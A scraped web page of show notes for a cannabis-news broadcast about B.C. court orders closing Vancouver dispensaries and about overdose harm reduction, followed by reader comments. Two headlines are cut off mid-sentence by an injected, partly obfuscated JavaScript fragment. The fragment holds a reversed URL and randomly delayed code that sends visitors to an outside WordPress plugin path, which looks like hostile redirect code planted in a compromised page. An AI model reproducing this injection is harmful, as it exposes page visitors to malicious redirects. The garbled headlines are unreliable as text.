Cannabis Culture News LIVE: Dispensaries Save Lives

Cannabis Culture News LIVE: Dispensaries Save Lives

POT TV – Watch Cannabis Culture News LIVE every Friday on Pot TV for the latest news and views on the marijuana community with your host Jeremiah Vandermeer, CEO of Cannabis Culture and Pot TV.

TUNE IN LIVE every Friday at 4pm pt on Pot.TV

Today: Dispensaries saving lives.

Show notes:

B.C. Supreme Court orders Vancouver’s cannabis dispensaries toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to shut down.

B.C. court sides with City of Vancouver on marijuana dispensaries.

Judge orders dozens of illegal Vancouver marijuana dispensaries toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to shut down.

The BC Supreme Court has ruled that marijuana dispensaries operating without a license must close.

Vancouver overdose emergency task force calls for expanded harm reduction, safe supply.

Mayor’s Overdose Emergency Task Force -Recommendations for Immediate Action on the Overdose Crisis

Marijuana dispensaries save lives, new study shows.

Youtube Channel

9 thoughts on “Cannabis Culture News LIVE: Dispensaries Save Lives”

  1. Juan Padilla Jr. says:

    I don't have access to seeds! Please please send some my way! I'm a injured worker that is currently battling for my medicine to help with my nerve damage in my back and legs due to an on the job injury in 2001! I have been suffering from pain and I am only given narcotics and the side effects are trees horrible! Thank you very much! Ps I can supply documentation of my injury and proof of the battles for my pain relief!

  2. Jed maple says:

    It must be incredibly frustrating and stressful to have to deal with an adversary that holds all the power and exerts little or no compassion or forethought and continues to treat citizens as impediments to their own ideals and dogma.
    Best of the holidays to all at Cannabis Culture. You deserve better in the new year.

  3. Jed maple says:

    What is the reason given for the proximity law? Are they afraid that the cannabis is going to explode?

  4. Felix Sheldon says:

    Medical Cannabis Sanctuary !

  5. Mack Daddy says:

    Fuck the goverment

  6. eric bryant says:

    regulate a plant get THA FUCK OUTTA HERE I love all 3 of you guys keep fighting until the laws are humane and ethically right

  7. Ganja Train says:

    freaking love it!

  8. Alien Grey says:

    You had a good run though, selling weed close to stuff. IDK what CC is close to, probably no schools in the Hastings area, just drug addicts. Maybe they're just too close to a legal one. Did you really think this rogue shop stuff could go on forever? If the authorities allowed that, with current laws, then logically why should they harass LSD shops, right? Should just be able to slap one up and sell as much as you can between raids, just keep small amounts in stock and hire suckers to actually deal the stuff hand-to-hand. You're clean, behind your offshore company, sitting in Tahiti directing operations online. LSD is good isn't it? Doesn't it "expand your consciousness"? Well, we need to provide access, to keep it out of the hands of kids, Get back, Billy, this candy is not for you, son, but your dad might want some, how many ya want, sir? A 100 sheet? Coming up.

  9. menaka dasi says:

    as a private Cannabis Consultant, I am so frustrated that the cities of Victoria and Vancouver have impeded with the efforts of local businesses, and patients, members of societies, and citizens, s with safe reasonable access to Cannabis and the bas a First Nations woman, and as a Citizen with a Cannabis Company representing the support of businesses like Cannabis Culture, I'd have to say, not only are we loosing court cases, we are loosing by GIVING OUR POWER – our power is precious !!!!! LET US NOT GIVE OUR POWER TO THESE MONEY HUNGRY Lawyers and Court Cases, we need to take this further and CREATE A PROGRAM ;that works, work with Mayor and Counsel, to create the future you want. In the City of Victoria I have approached our mayor about a CO Op and a hand was shook, she agrees we need this, and yet there is no where in the zone available for me to open shop, I had to literally . hunt around this whole province all summer looking at locations for my business and others, and what I saw and heard is that many Lawyers, Mayors and City Officials anre MEDDLING !!!! They are Stalling the process further, making it difficult for shop owners, and giving a green light to businesses that got in on the hands of organized crime or who are bullies fighting for a place of real estate ? not only that, I was initially invited into the Chamber of Commerce, and then not invited to the Chamber because of the nature of my business. These mayors, city counsellors, and elected officials do not know what they have gotten their hands in, it is a total MESS!!!!!! Where are we going to get a business if all the locations are taken by the already existing STRONG ESTABLISHMENT? why can't a farmer and a craft producer just open a store where they see fit ITS ALREADY SO EXPENSIVE HAVING A FARM!!!!! HAVE YOU EVER FARMED MAYOR OF VANCOUVER ? Why can't we choose to allow our stores to meet the needs of the communities, instead of MONOPOLIZE – Sensible. real estate laws, so people can get off of opioids in every community like a walk from a pub to your house, its ridiculous that these stores are being so aggressively harassed s corporate greed seems to control the stock market. Lawyers are taking our money gladly to make us fight with the city, to explain what we need, and the politicians want our cities to work, so if you present a working city platform, as a united co alition of Cannabis Businesses, with First Nations leaders, like that of Village Bloom in Chilliwack, the BC Craft Cannabis Supply co and other organizations I'm involved with want us to work to create a solution, I really do think it is forming a CO Operative, we do not have the power when we give it to Politicians and Lawyers, we need to take the power back, and the lawyers I've talked to dont want me making a co op, it will destabilize the market, but get real, if we make a transparent and clear platform for unification of workers, shop owners, patients/ members, consumers, neighbours, they cant fight with that, it feels like somewhere we gave our power away for us all to be capitalists and forgot how to farm together like a group of farmers who want to support economic growth, Vancouver can't fight with you if you WORK TOGETHER OUTSMART THE CITY !!! WE NEED A CANNABIS CO ALITION !

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